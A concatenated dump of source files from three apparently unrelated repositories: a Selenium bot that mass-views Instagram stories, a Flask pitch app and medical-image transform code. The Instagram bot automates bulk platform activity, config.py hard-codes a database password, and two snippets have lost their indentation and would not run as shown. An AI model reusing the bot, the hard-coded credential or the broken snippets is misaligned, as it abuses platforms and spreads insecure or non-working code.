        logging.info("YOU NOW NEED TO CLICK ON 'LOGIN' BUTTON FOR YOURSELF AND THEN SKIP NOTIFICATION! YOU HAVE 15 SECONDS!")
        time.sleep(15)

    def viewStory(self, username):
        """Open *username*'s stories page and click into it; returns an error
        message string when no story is available."""
        try:
            self.browser.openPageWaitForElem(InstagramLinkEndpoints.buildStoriesPage(username), "//div[@class='_7UhW9 xLCgt MMzan h_zdq uL8Hv ']")
            self.browser.locateElemXpath("//div[@class='_7UhW9 xLCgt MMzan h_zdq uL8Hv ']").click()
        except Exception:
            # Bug fix: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit.
            return "Seems like user doesn't have a story!"
|
ractyfree/instaStoiner | classes/ChromeDriver.py | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import pickle
import os
import random
import time
class ChromeDriverClass:
    """Selenium Chrome driver wrapper: tab management, cookie persistence,
    and small page/element helpers."""

    CHROMEDRIVERRPATH = "bin/chromedriver.exe"
    COOKIESFILE = "cookies.pkl"
    DEFAULTTIMEOUT = 3  # seconds to wait for elements to appear

    def __init__(self, cookies=False, tabs=3):
        self.driver = self.getBrowser()
        self.tabs = tabs
        # Bug fix: the original referenced `self.__loadCookies` without
        # calling it, so saved cookies were never actually loaded.
        if cookies and self.__isThereCookies():
            self.__loadCookies()

    def getBrowser(self):
        """Start a Chrome instance using the bundled chromedriver binary."""
        return webdriver.Chrome(executable_path=self.CHROMEDRIVERRPATH)

    def makeNewTabs(self):
        """Open self.tabs additional empty browser tabs."""
        for _ in range(0, self.tabs):
            self.driver.execute_script("window.open('');")

    def switchTab(self, tab):
        return self.driver.switch_to_window(tab)

    def getAllTabs(self):
        """Return the handles of all open windows/tabs."""
        return self.driver.window_handles

    def openPage(self, page):
        return self.driver.get(page)

    def locateElemXpath(self, xpath):
        return self.driver.find_element_by_xpath(xpath)

    def openPageWaitForElem(self, page, xpath):
        """Open *page* and block until the element at *xpath* is present."""
        self.openPage(page)
        WebDriverWait(self.driver, self.DEFAULTTIMEOUT).until(EC.presence_of_element_located((By.XPATH, xpath)))

    def saveCookies(self):
        """Pickle the current session cookies to COOKIESFILE."""
        with open(self.COOKIESFILE, "wb") as fh:
            pickle.dump(self.driver.get_cookies(), fh)

    def __loadCookies(self):
        # NOTE: only load pickles written by saveCookies (pickle is unsafe on
        # untrusted data).
        with open(self.COOKIESFILE, "rb") as fh:
            cookies = pickle.load(fh)
        for cookie in cookies:
            # Bug fix: the loop iterated as `x` but added an undefined name
            # `cookie`, raising NameError on the first cookie.
            self.driver.add_cookie(cookie)

    def __isThereCookies(self):
        return os.path.exists(self.COOKIESFILE)

    def sendTextForm(self, text, xpath):
        """Type *text* into the form at *xpath* one key at a time."""
        inputForm = self.locateElemXpath(xpath)
        for x in text:
            inputForm.send_keys(x)
            time.sleep(0.05)
ractyfree/instaStoiner | instaStoiner.py | <gh_stars>1-10
from classes.ChromeDriver import *
from classes.Instagram import *
from classes.InstagramLinkEndpoints import *
class InstaStoiner:
    """Log in once, then view each listed user's story, spreading the work
    across several browser tabs."""
    TIMEOFSTORY = 30

    def __init__(self, login, password, users_list=None, storviewcnt=100000, cookies=False, tabs=3):
        self.login = login
        self.password = password
        # Bug fix: the default was a mutable list ([]) shared across every
        # instance constructed without users_list.
        self.users_list = users_list if users_list is not None else []
        self.storviewcnt = storviewcnt
        self.cookies = cookies
        self.tabs = tabs

    def __makeQueue(self):
        """Pair each user with a tab index, cycling through indexes
        0..self.tabs inclusive (the original window plus the opened tabs)."""
        queue = []
        tab = 0
        for user in self.users_list:
            if tab > self.tabs:
                tab = 0
            queue.append([user, tab])
            tab += 1
        return queue

    def start(self):
        """Log in, open the extra tabs, then view each queued user's story."""
        browser = ChromeDriverClass(self.cookies, self.tabs)
        insta = Instagram(self.login, self.password, browser)
        insta.doLogin()
        # We are logged in! Iterate through all users and watch their stories.
        browser.makeNewTabs()
        tabs = browser.getAllTabs()
        for user, tab in self.__makeQueue():
            browser.switchTab(tabs[tab])
            insta.viewStory(user)
            time.sleep(1)
|
ractyfree/instaStoiner | classes/InstagramLinkEndpoints.py | <filename>classes/InstagramLinkEndpoints.py
class InstagramLinkEndpoints:
loginPage = "https://www.instagram.com/accounts/login"
mainPage = "https://www.instagram.com/"
def buildProfilePage(username):
return "https://www.instagram.com/" + username + "/"
def buildStoriesPage(username):
return "https://www.instagram.com/stories/" + username + "/"
|
ractyfree/instaStoiner | example_USAGE.py | from instaStoiner import*
def readFile(filename):
    """Return every line of *filename* as a list (trailing newlines kept).

    Bug fix: the original opened the file and never closed it; the context
    manager guarantees the handle is released.
    """
    with open(filename) as f:
        return list(f)
# Read the target usernames (one per line) and start viewing their stories.
if __name__ == "__main__":
    users = readFile("users_cruslah.txt")
    insta = InstaStoiner("YOUR_LOGIN", "YOUR_PASSWORD", users_list=users)
    insta.start()
|
mamu234/one-minute-pitch | config.py | <filename>config.py
import os
class Config:
    """Base configuration shared by all environments."""
    # NOTE(review): database credentials are hard-coded in source; prefer
    # loading this URI from the environment as ProdConfig does.
    SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://carolyne:123@localhost/pitches'
    SECRET_KEY = os.environ.get('SECRET_KEY')
    SQLALCHEMY_TRACK_MODIFICATIONS = False
class DevConfig(Config):
    """Development configuration: enables Flask debug mode."""
    DEBUG = True
class ProdConfig(Config):
    """Production configuration: reads DATABASE_URL from the environment.

    Heroku-style URLs use the legacy "postgres://" scheme; normalize it to
    the "postgresql://" scheme SQLAlchemy expects.
    """
    SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL")
    if SQLALCHEMY_DATABASE_URI and SQLALCHEMY_DATABASE_URI.startswith("postgres://"):
        SQLALCHEMY_DATABASE_URI = SQLALCHEMY_DATABASE_URI.replace("postgres://", "postgresql://", 1)
    # Dead `pass` statement removed (the class body is non-empty).
# Map environment names (used at app creation) to their configuration classes.
config_options= {
    'development': DevConfig,
    'production': ProdConfig
}
|
mamu234/one-minute-pitch | app/main/forms.py | from flask_wtf import FlaskForm
from wtforms import StringField,PasswordField,SubmitField, TextAreaField, SelectField
from wtforms.validators import InputRequired,Email,EqualTo
from ..models import Users
class UpdateProfile(FlaskForm):
    """Form for editing the user's profile bio."""
    bio = TextAreaField('Tell us about yourself:',validators = [InputRequired()])
    submit = SubmitField('Submit')
class PitchForm(FlaskForm):
    """Form for submitting a new pitch (title, category, body)."""
    title = StringField('Title', validators=[InputRequired()])
    category = SelectField('Category', choices=[('Events','Events'),('Job','Job'),('Advertisement','Advertisement')],validators=[InputRequired()])
    post = TextAreaField('Your Pitch', validators=[InputRequired()])
    submit = SubmitField('Pitch')
class CommentForm(FlaskForm):
    """Form for leaving a comment on a pitch."""
    comment = TextAreaField('Leave a comment',validators=[InputRequired()])
    submit = SubmitField('Comment')
mamu234/one-minute-pitch | app/models.py | from . import db,login_manager
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin, current_user
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: resolve a session user id to a Users row."""
    # NOTE(review): a second @login_manager.user_loader at the bottom of this
    # module re-registers load_user and overrides this definition.
    return Users.query.get(int(user_id))
class Users(UserMixin,db.Model):
    """Application user account; integrates with Flask-Login via UserMixin."""
    __tablename__ = 'users'
    id = db.Column(db.Integer,primary_key = True)
    username = db.Column(db.String(255),unique = True, nullable = False)
    email = db.Column(db.String(255),unique = True, nullable = False)
    # Only the salted hash is stored; see the write-only `password` property.
    pass_safe = db.Column(db.String(255), nullable = False)
    bio = db.Column(db.String(255))
    prof_pic_path = db.Column(db.String())
    role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
    pitches = db.relationship('Pitches', backref='user', lazy='dynamic')
    comments = db.relationship('Comment', backref='user', lazy='dynamic')
    upvotes = db.relationship('Upvote', backref='user', lazy='dynamic')
    downvotes = db.relationship('Downvote', backref='user', lazy='dynamic')

    @property
    def password(self):
        """Write-only: reading the plaintext password is deliberately forbidden."""
        raise AttributeError('You cannot read the password attribute')

    @password.setter
    def password(self, password):
        # Hash on assignment; plaintext is never persisted.
        self.pass_safe = generate_password_hash(password)

    def verify_password(self,password):
        """Return True if *password* matches the stored hash."""
        return check_password_hash(self.pass_safe,password)

    def user_save(self):
        """Persist this user to the database."""
        db.session.add(self)
        db.session.commit()

    def user_delete(self):
        """Delete this user from the database."""
        db.session.delete(self)
        db.session.commit()

    def __repr__(self):
        return f'User {self.username}'
class Pitches(db.Model):
    """A one-minute pitch posted by a user, with comments and votes."""
    __tablename__ = 'pitches'
    id = db.Column(db.Integer, primary_key = True)
    pitchtitle = db.Column(db.String(255),nullable = False)
    post = db.Column(db.String(255),nullable = False)
    comments = db.relationship('Comment', backref='pitch', lazy='dynamic')
    upvote = db.relationship('Upvote',backref='pitch',lazy='dynamic')
    downvote = db.relationship('Downvote',backref='pitch',lazy='dynamic')
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    time = db.Column(db.DateTime, default = datetime.utcnow)
    category = db.Column(db.String(255), index = True,nullable = False)

    def pitch_save(self):
        """Persist this pitch to the database."""
        db.session.add(self)
        db.session.commit()

    def pitch_delete(self):
        """Delete this pitch from the database."""
        db.session.delete(self)
        db.session.commit()

    def __repr__(self):
        # Bug fix: previously referenced the nonexistent attribute
        # `self.pitch` (raising AttributeError) and was labelled 'User'.
        return f'Pitch {self.pitchtitle}'
class Role(db.Model):
    """A user role; one role is shared by many users."""
    __tablename__ = 'roles'
    id = db.Column(db.Integer,primary_key = True)
    name = db.Column(db.String(255))
    users = db.relationship('Users',backref = 'role',lazy="dynamic")

    def __repr__(self):
        # Fix copy-pasted label: this is a Role, not a User.
        return f'Role {self.name}'
class Comment(db.Model):
    """A comment left by a user on a pitch."""
    __tablename__ = 'comments'
    id = db.Column(db.Integer, primary_key=True)
    comment = db.Column(db.Text(),nullable = False)
    user_id = db.Column(db.Integer,db.ForeignKey('users.id'),nullable = False)
    pitch_id = db.Column(db.Integer,db.ForeignKey('pitches.id'),nullable = False)

    def save_c(self):
        """Persist this comment to the database."""
        db.session.add(self)
        db.session.commit()

    @classmethod
    def get_comments(cls,pitch_id):
        """Return all comments attached to the given pitch."""
        comments = Comment.query.filter_by(pitch_id=pitch_id).all()
        return comments

    def __repr__(self):
        return f'comment:{self.comment}'
class Upvote(db.Model):
    """A single user's upvote on a pitch."""
    __tablename__ = 'upvotes'
    id = db.Column(db.Integer,primary_key=True)
    user_id = db.Column(db.Integer,db.ForeignKey('users.id'))
    pitch_id = db.Column(db.Integer,db.ForeignKey('pitches.id'))

    def save(self):
        """Persist this upvote to the database."""
        db.session.add(self)
        db.session.commit()

    @classmethod
    def get_upvotes(cls,id):
        """Return all upvotes recorded for the given pitch id."""
        upvote = Upvote.query.filter_by(pitch_id=id).all()
        return upvote

    def __repr__(self):
        return f'{self.user_id}:{self.pitch_id}'
class Downvote(db.Model):
    """A single user's downvote on a pitch."""
    __tablename__ = 'downvotes'
    id = db.Column(db.Integer,primary_key=True)
    user_id = db.Column(db.Integer,db.ForeignKey('users.id'))
    pitch_id = db.Column(db.Integer,db.ForeignKey('pitches.id'))

    def save(self):
        """Persist this downvote to the database."""
        db.session.add(self)
        db.session.commit()

    @classmethod
    def get_downvotes(cls,id):
        """Return all downvotes recorded for the given pitch id."""
        downvote = Downvote.query.filter_by(pitch_id=id).all()
        return downvote

    def __repr__(self):
        return f'{self.user_id}:{self.pitch_id}'
# NOTE(review): duplicate @login_manager.user_loader registration — this one
# overrides the load_user defined near the top of the module; one of the two
# should be removed.
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: resolve a session user id to a Users row."""
    # Consistency fix: cast to int like the earlier load_user definition
    # (session ids arrive as strings).
    return Users.query.get(int(user_id))
|
nekohayo/ivadomed | ivadomed/scripts/convert_to_onnx.py | import argparse
import torch
from ivadomed import utils as imed_utils
def get_parser():
    """Build the command-line parser for the PyTorch-to-ONNX conversion script."""
    p = argparse.ArgumentParser()
    p.add_argument("-m", "--model", dest="model", required=True, type=str, help="Path to .pt model.")
    p.add_argument("-d", "--dimension", dest="dimension", required=True,
                   type=int, help="Input dimension (2 for 2D inputs, 3 for 3D inputs).")
    p.add_argument("-n", "--n_channels", dest="n_channels", default=1, type=int,
                   help="Number of input channels of the model.")
    p.add_argument("-g", "--gpu", dest="gpu", default=0, type=str, help="GPU number if available.")
    return p
def convert_pytorch_to_onnx(model, dimension, n_channels, gpu=0):
    """Convert PyTorch model to ONNX.

    The integration of Deep Learning models into the clinical routine requires cpu optimized models. To export the
    PyTorch models to `ONNX <https://github.com/onnx/onnx>`_ format and to run the inference using
    `ONNX Runtime <https://github.com/microsoft/onnxruntime>`_ is a time and memory efficient way to answer this need.

    This function converts a model from PyTorch to ONNX format, with information of whether it is a 2D or 3D model
    (``-d``).

    Args:
        model (string): Model filename. Flag: ``--model``, ``-m``.
        dimension (int): Indicates whether the model is 2D or 3D. Choice between 2 or 3. Flag: ``--dimension``, ``-d``
        n_channels (int): Number of input channels of the model. Flag: ``--n_channels``, ``-n``
        gpu (string): GPU ID, if available. Flag: ``--gpu``, ``-g``
    """
    import os

    if torch.cuda.is_available():
        device = "cuda:" + str(gpu)
    else:
        device = "cpu"

    model_net = torch.load(model, map_location=device)
    # Dummy input matching the model dimensionality (2D: NCHW, 3D: NCDHW).
    dummy_input = torch.randn(1, n_channels, 96, 96, device=device) if dimension == 2 \
        else torch.randn(1, n_channels, 96, 96, 96, device=device)
    # Bug fix: model.replace("pt", "onnx") replaced the FIRST occurrence of
    # "pt" anywhere in the path (e.g. "/opt/model.pt" -> "/onnx/model.pt");
    # swap the file extension instead.
    fname_out = os.path.splitext(model)[0] + ".onnx"
    imed_utils.save_onnx_model(model_net, dummy_input, fname_out)
def main():
    """CLI entry point: parse arguments and run the PyTorch-to-ONNX conversion."""
    imed_utils.init_ivadomed()
    parser = get_parser()
    args = parser.parse_args()
    fname_model = args.model
    dimension = int(args.dimension)
    gpu = str(args.gpu)
    n_channels = args.n_channels
    # Run Script
    convert_pytorch_to_onnx(fname_model, dimension, n_channels, gpu)

if __name__ == '__main__':
    main()
|
nekohayo/ivadomed | ivadomed/transforms.py | <reponame>nekohayo/ivadomed
import copy
import functools
import math
import numbers
import random
import numpy as np
import torch
from scipy.ndimage import zoom
from scipy.ndimage.filters import gaussian_filter
from scipy.ndimage.interpolation import map_coordinates, affine_transform
from scipy.ndimage.measurements import label, center_of_mass
from scipy.ndimage.morphology import binary_dilation, binary_fill_holes, binary_closing
from skimage.exposure import equalize_adapthist
from torchvision import transforms as torchvision_transforms
from ivadomed.loader import utils as imed_loader_utils
def multichannel_capable(wrapped):
    """Decorator to make a given function compatible multichannel images.

    Args:
        wrapped: Given function.

    Returns:
        Functions' return.
    """
    @functools.wraps(wrapped)
    def wrapper(self, sample, metadata):
        # A list sample means one entry per channel: apply the transform to
        # each channel, keeping metadata in sync between channels.
        if isinstance(sample, list):
            list_data, list_metadata = [], []
            for s_cur, m_cur in zip(sample, metadata):
                if len(list_metadata) > 0:
                    # Propagate metadata updated by the previous channel's
                    # transform into the current channel's metadata.
                    if not isinstance(list_metadata[-1], list):
                        imed_loader_utils.update_metadata([list_metadata[-1]], [m_cur])
                    else:
                        imed_loader_utils.update_metadata(list_metadata[-1], [m_cur])
                # Run function for each sample of the list
                data_cur, metadata_cur = wrapped(self, s_cur, m_cur)
                list_data.append(data_cur)
                list_metadata.append(metadata_cur)
            return list_data, list_metadata
        # If sample is None, then return a pair (None, None)
        if sample is None:
            return None, None
        else:
            return wrapped(self, sample, metadata)
    return wrapper
def two_dim_compatible(wrapped):
    """Decorator making a 3D transform accept 2D samples transparently.

    A 2D sample is promoted to 3D by appending a singleton trailing axis,
    run through the wrapped transform, then squeezed back to 2D. Samples
    that are already 3D (or higher) pass straight through.

    Args:
        wrapped: Given function.

    Returns:
        Functions' return.
    """
    @functools.wraps(wrapped)
    def wrapper(self, sample, metadata):
        if len(sample.shape) != 2:
            return wrapped(self, sample, metadata)
        # Promote 2D -> 3D, transform, then drop the added axis again.
        expanded = np.expand_dims(sample, axis=-1)
        result, result_metadata = wrapped(self, expanded, metadata)
        return np.squeeze(result, axis=-1), result_metadata
    return wrapper
class ImedTransform(object):
    """Base class for transformations.

    Subclasses implement ``__call__(sample, metadata)`` (and optionally
    ``undo_transform``) and return a ``(sample, metadata)`` pair.
    """
    def __call__(self, sample, metadata=None):
        raise NotImplementedError("You need to implement the transform() method.")
class Compose(object):
    """Composes transforms together.

    Composes transforms together and split between images, GT and ROI.
    self.transform is a dict:
        - keys: "im", "gt" and "roi"
        - values torchvision_transform.Compose objects.

    Transform classes are resolved by name via ``globals()``, so every
    transform listed in ``dict_transforms`` must be defined in this module.

    Attributes:
        dict_transforms (dict): Dictionary where the keys are the transform names
            and the value their parameters.
        requires_undo (bool): If True, does not include transforms which do not have an undo_transform
            implemented yet.

    Args:
        transform (dict): Keys are "im", "gt", "roi" and values are torchvision_transforms.Compose of the
            transformations of interest.
    """
    def __init__(self, dict_transforms, requires_undo=False):
        list_tr_im, list_tr_gt, list_tr_roi = [], [], []
        for transform in dict_transforms.keys():
            parameters = dict_transforms[transform]
            # Get list of data type
            if "applied_to" in parameters:
                list_applied_to = parameters["applied_to"]
            else:
                list_applied_to = ["im", "gt", "roi"]
            # call transform: instantiate the class whose name matches the key,
            # stripping the bookkeeping keys that are not constructor arguments
            if transform in globals():
                params_cur = {k: parameters[k] for k in parameters if k != "applied_to" and k != "preprocessing"}
                transform_obj = globals()[transform](**params_cur)
            else:
                raise ValueError('ERROR: {} transform is not available. '
                                 'Please check its compatibility with your model json file.'.format(transform))
            # check if undo_transform method is implemented
            if requires_undo:
                if not hasattr(transform_obj, 'undo_transform'):
                    print('{} transform not included since no undo_transform available for it.'.format(transform))
                    continue
            if "im" in list_applied_to:
                list_tr_im.append(transform_obj)
            if "roi" in list_applied_to:
                list_tr_roi.append(transform_obj)
            if "gt" in list_applied_to:
                list_tr_gt.append(transform_obj)
        self.transform = {
            "im": torchvision_transforms.Compose(list_tr_im),
            "gt": torchvision_transforms.Compose(list_tr_gt),
            "roi": torchvision_transforms.Compose(list_tr_roi)}

    def __call__(self, sample, metadata, data_type='im'):
        # Nothing to do when no pipeline is registered or metadata is empty.
        if self.transform[data_type] is None or len(metadata) == 0:
            # In case self.transform[data_type] is None
            return None, None
        else:
            # Apply the transforms sequentially, threading metadata through.
            for tr in self.transform[data_type].transforms:
                sample, metadata = tr(sample, metadata)
            return sample, metadata
class UndoCompose(object):
    """Undo the Compose transformations.

    Call the undo transformations in the inverse order than the "do transformations".

    Attributes:
        transforms (Compose): Composed transforms to revert.

    Args:
        compose (Compose): Composed transforms to revert.
    """
    def __init__(self, compose):
        self.transforms = compose

    def __call__(self, sample, metadata, data_type='gt'):
        chain = self.transforms.transform[data_type]
        # No pipeline registered for this data type: nothing to undo.
        if chain is None:
            return None, None
        # Walk the pipeline backwards, undoing one transform at a time.
        for transform in reversed(chain.transforms):
            sample, metadata = transform.undo_transform(sample, metadata)
        return sample, metadata
class UndoTransform(object):
    """Expose a transform's undo operation as a plain callable.

    Attributes:
        transform (ImedTransform): Transform whose ``undo_transform`` is invoked.

    Args:
        transform (ImedTransform):
    """
    def __init__(self, transform):
        self.transform = transform

    def __call__(self, sample):
        # Delegate directly to the wrapped transform's undo operation.
        return self.transform.undo_transform(sample)
class NumpyToTensor(ImedTransform):
    """Converts nd array to tensor object."""

    def undo_transform(self, sample, metadata=None):
        """Converts Tensor to nd array."""
        return list(sample.numpy()), metadata

    def __call__(self, sample, metadata=None):
        """Converts nd array to Tensor."""
        # Contiguous layout avoids axes-permutation issues in torch.from_numpy.
        contiguous = np.ascontiguousarray(np.array(sample))
        return torch.from_numpy(contiguous), metadata
class Resample(ImedTransform):
    """
    Resample image to a given resolution.

    Args:
        hspace (float): Resolution along the first axis, in mm.
        wspace (float): Resolution along the second axis, in mm.
        dspace (float): Resolution along the third axis, in mm.
    """
    def __init__(self, hspace, wspace, dspace=1.):
        self.hspace = hspace
        self.wspace = wspace
        self.dspace = dspace

    @multichannel_capable
    @two_dim_compatible
    def undo_transform(self, sample, metadata=None):
        """Resample to original resolution."""
        assert "data_shape" in metadata
        is_2d = sample.shape[-1] == 1
        # Get params
        original_shape = metadata["preresample_shape"]
        current_shape = sample.shape
        params_undo = [x / y for x, y in zip(original_shape, current_shape)]
        if is_2d:
            # 2D data: never resample along the singleton depth axis
            params_undo[-1] = 1.0
        # Undo resampling
        # NOTE(review): spline order is 1 for GT and 2 for images here, while
        # label data is conventionally resampled with order 0 — confirm intended.
        data_out = zoom(sample,
                        zoom=params_undo,
                        order=1 if metadata['data_type'] == 'gt' else 2)
        # Data type
        data_out = data_out.astype(sample.dtype)
        return data_out, metadata

    @multichannel_capable
    @multichannel_capable  # for multiple raters during training/preprocessing
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        """Resample to a given resolution, in millimeters."""
        # Get params
        # Voxel dimension in mm
        is_2d = sample.shape[-1] == 1
        # Remember the input shape so undo_transform can restore it
        metadata['preresample_shape'] = sample.shape
        zooms = list(metadata["zooms"])
        if len(zooms) == 2:
            zooms += [1.0]
        # Zoom factor = current voxel size / target voxel size, per axis
        hfactor = zooms[0] / self.hspace
        wfactor = zooms[1] / self.wspace
        dfactor = zooms[2] / self.dspace
        params_resample = (hfactor, wfactor, dfactor) if not is_2d else (hfactor, wfactor, 1.0)
        # Run resampling
        data_out = zoom(sample,
                        zoom=params_resample,
                        order=1 if metadata['data_type'] == 'gt' else 2)
        # Data type
        data_out = data_out.astype(sample.dtype)
        return data_out, metadata
class NormalizeInstance(ImedTransform):
    """Normalize a tensor or an array image with mean and standard deviation estimated from the sample itself."""

    @multichannel_capable
    def undo_transform(self, sample, metadata=None):
        """Identity: the normalization is not undone."""
        # Nothing
        return sample, metadata

    @multichannel_capable
    def __call__(self, sample, metadata=None):
        """Return the z-scored sample: (sample - mean) / std.

        Guards against a zero standard deviation (constant image), which would
        otherwise produce NaN/Inf values through a division by zero.
        """
        std = sample.std()
        if std == 0:
            # Constant image: only center it instead of dividing by zero.
            return sample - sample.mean(), metadata
        data_out = (sample - sample.mean()) / std
        return data_out, metadata
class CroppableArray(np.ndarray):
"""Zero padding slice past end of array in numpy.
Adapted From: https://stackoverflow.com/a/41155020/13306686
"""
def __getitem__(self, item):
all_in_slices = []
pad = []
for dim in range(self.ndim):
# If the slice has no length then it's a single argument.
# If it's just an integer then we just return, this is
# needed for the representation to work properly
# If it's not then create a list containing None-slices
# for dim>=1 and continue down the loop
try:
len(item)
except TypeError:
if isinstance(item, int):
return super().__getitem__(item)
newitem = [slice(None)] * self.ndim
newitem[0] = item
item = newitem
# We're out of items, just append noop slices
if dim >= len(item):
all_in_slices.append(slice(0, self.shape[dim]))
pad.append((0, 0))
# We're dealing with an integer (no padding even if it's
# out of bounds)
if isinstance(item[dim], int):
all_in_slices.append(slice(item[dim], item[dim] + 1))
pad.append((0, 0))
# Dealing with a slice, here it get's complicated, we need
# to correctly deal with None start/stop as well as with
# out-of-bound values and correct padding
elif isinstance(item[dim], slice):
# Placeholders for values
start, stop = 0, self.shape[dim]
this_pad = [0, 0]
if item[dim].start is None:
start = 0
else:
if item[dim].start < 0:
this_pad[0] = -item[dim].start
start = 0
else:
start = item[dim].start
if item[dim].stop is None:
stop = self.shape[dim]
else:
if item[dim].stop > self.shape[dim]:
this_pad[1] = item[dim].stop - self.shape[dim]
stop = self.shape[dim]
else:
stop = item[dim].stop
all_in_slices.append(slice(start, stop))
pad.append(tuple(this_pad))
# Let numpy deal with slicing
ret = super().__getitem__(tuple(all_in_slices))
# and padding
ret = np.pad(ret, tuple(pad), mode='constant', constant_values=0)
return ret
class Crop(ImedTransform):
    """Crop data.

    Args:
        size (list of int): Size of the output sample. Length 2 for 2D samples, 3 for 3D samples.

    Attributes:
        size (list of int): Size of the output sample, always of length 3 (depth 0 appended for 2D).
    """
    def __init__(self, size):
        # NOTE(review): `size + [0]` requires a list; the previous docstring said tuple — confirm callers.
        self.size = size if len(size) == 3 else size + [0]

    @staticmethod
    def _adjust_padding(npad, sample):
        # Clamp negative pad amounts to zero by cropping `sample` instead:
        # a negative pad arises when the crop window extended past the original
        # volume, so the undo step must crop rather than pad on that side.
        npad_out_tuple = []
        for idx_dim, tuple_pad in enumerate(npad):
            pad_start, pad_end = tuple_pad
            if pad_start < 0 or pad_end < 0:
                # Move axis of interest
                sample_reorient = np.swapaxes(sample, 0, idx_dim)
                # Adjust pad and crop
                if pad_start < 0 and pad_end < 0:
                    sample_crop = sample_reorient[abs(pad_start):pad_end, ]
                    pad_end, pad_start = 0, 0
                elif pad_start < 0:
                    sample_crop = sample_reorient[abs(pad_start):, ]
                    pad_start = 0
                else:  # i.e. pad_end < 0:
                    sample_crop = sample_reorient[:pad_end, ]
                    pad_end = 0
                # Reorient
                sample = np.swapaxes(sample_crop, 0, idx_dim)
            npad_out_tuple.append((pad_start, pad_end))
        return npad_out_tuple, sample

    @multichannel_capable
    @multichannel_capable  # for multiple raters during training/preprocessing
    def __call__(self, sample, metadata):
        """Crop `sample` using the window stored in metadata['crop_params'].

        Subclasses compute and store the window before delegating here.
        """
        # Get params
        is_2d = sample.shape[-1] == 1
        th, tw, td = self.size
        fh, fw, fd, h, w, d = metadata['crop_params'][self.__class__.__name__]
        # Crop data
        # Note we use here CroppableArray in order to deal with "out of boundaries" crop
        # e.g. if fh is negative or fh+th out of bounds, then it will pad
        if is_2d:
            data_out = sample.view(CroppableArray)[fh:fh + th, fw:fw + tw, :]
        else:
            data_out = sample.view(CroppableArray)[fh:fh + th, fw:fw + tw, fd:fd + td]
        return data_out, metadata

    @multichannel_capable
    @two_dim_compatible
    def undo_transform(self, sample, metadata=None):
        """Pad the cropped sample back to its pre-crop shape."""
        # Get crop params
        is_2d = sample.shape[-1] == 1
        th, tw, td = self.size
        fh, fw, fd, h, w, d = metadata["crop_params"][self.__class__.__name__]
        # Compute params to undo transform: pad each side by what was cropped away
        pad_left = fw
        pad_right = w - pad_left - tw
        pad_top = fh
        pad_bottom = h - pad_top - th
        pad_front = fd if not is_2d else 0
        pad_back = d - pad_front - td if not is_2d else 0
        npad = [(pad_top, pad_bottom), (pad_left, pad_right), (pad_front, pad_back)]
        # Check and adjust npad if needed, i.e. if crop out of boundaries
        npad_adj, sample_adj = self._adjust_padding(npad, sample.copy())
        # Apply padding
        data_out = np.pad(sample_adj,
                          npad_adj,
                          mode='constant',
                          constant_values=0).astype(sample.dtype)
        return data_out, metadata
class CenterCrop(Crop):
    """Make a centered crop of a specified size."""

    @multichannel_capable
    @multichannel_capable  # for multiple raters during training/preprocessing
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        # Target and current dimensions
        target_h, target_w, target_d = self.size
        cur_h, cur_w, cur_d = sample.shape
        # Top-left-front corner of the centered crop window
        start_h = int(round((cur_h - target_h) / 2.))
        start_w = int(round((cur_w - target_w) / 2.))
        start_d = int(round((cur_d - target_d) / 2.))
        metadata['crop_params'][self.__class__.__name__] = (start_h, start_w, start_d, cur_h, cur_w, cur_d)
        # Delegate the actual cropping to the base class
        return super().__call__(sample, metadata)
class ROICrop(Crop):
    """Make a crop of a specified size around a Region of Interest (ROI).

    The crop window is computed once, from the ROI mask's center of mass, and
    cached in ``metadata['crop_params']`` so subsequent image/GT samples of the
    same subject reuse the same window.
    """

    @multichannel_capable
    @multichannel_capable  # for multiple raters during training/preprocessing
    @two_dim_compatible
    def __call__(self, sample, metadata=None):
        # If crop_params are not in metadata,
        # then we are here dealing with ROI data to determine crop params
        if self.__class__.__name__ not in metadata['crop_params']:
            # Compute center of mass of the ROI.
            # BUG FIX: np.int was removed in NumPy 1.24; use the builtin int.
            h_roi, w_roi, d_roi = center_of_mass(sample.astype(int))
            h_roi, w_roi, d_roi = int(round(h_roi)), int(round(w_roi)), int(round(d_roi))
            th, tw, td = self.size
            th_half, tw_half, td_half = int(round(th / 2.)), int(round(tw / 2.)), int(round(td / 2.))
            # compute top left corner of the crop area
            fh = h_roi - th_half
            fw = w_roi - tw_half
            fd = d_roi - td_half
            # Crop params
            h, w, d = sample.shape
            params = (fh, fw, fd, h, w, d)
            metadata['crop_params'][self.__class__.__name__] = params
        # Call base method
        return super().__call__(sample, metadata)
class DilateGT(ImedTransform):
    """Randomly dilate a ground-truth tensor.

    .. image:: ../../images/dilate-gt.png
        :width: 600px
        :align: center

    Args:
        dilation_factor (float): Controls the number of dilation iterations. For each individual lesion, the number of
            dilation iterations is computed as follows:
                nb_it = int(round(dilation_factor * sqrt(lesion_area)))
            If dilation_factor <= 0, then no dilation will be performed.

    Note: np.int / np.float were removed in NumPy 1.24 / 1.20; the builtin
    int / float types are used instead throughout this class (bug fix).
    """
    def __init__(self, dilation_factor):
        self.dil_factor = dilation_factor

    @staticmethod
    def dilate_lesion(arr_bin, arr_soft, label_values):
        """Grow the lesion by one voxel layer per entry of ``label_values``,
        assigning each new layer the corresponding soft value in ]0, 1[."""
        for lb in label_values:
            # binary dilation with 1 iteration
            arr_dilated = binary_dilation(arr_bin, iterations=1)
            # isolate new voxels, i.e. the ones from the dilation
            new_voxels = np.logical_xor(arr_dilated, arr_bin).astype(int)
            # assign a soft value (]0, 1[) to the new voxels
            soft_new_voxels = lb * new_voxels
            # add the new voxels to the input mask
            arr_soft += soft_new_voxels
            arr_bin = (arr_soft > 0).astype(int)
        return arr_bin, arr_soft

    def dilate_arr(self, arr, dil_factor):
        """Dilate each connected object of ``arr`` independently.

        Returns:
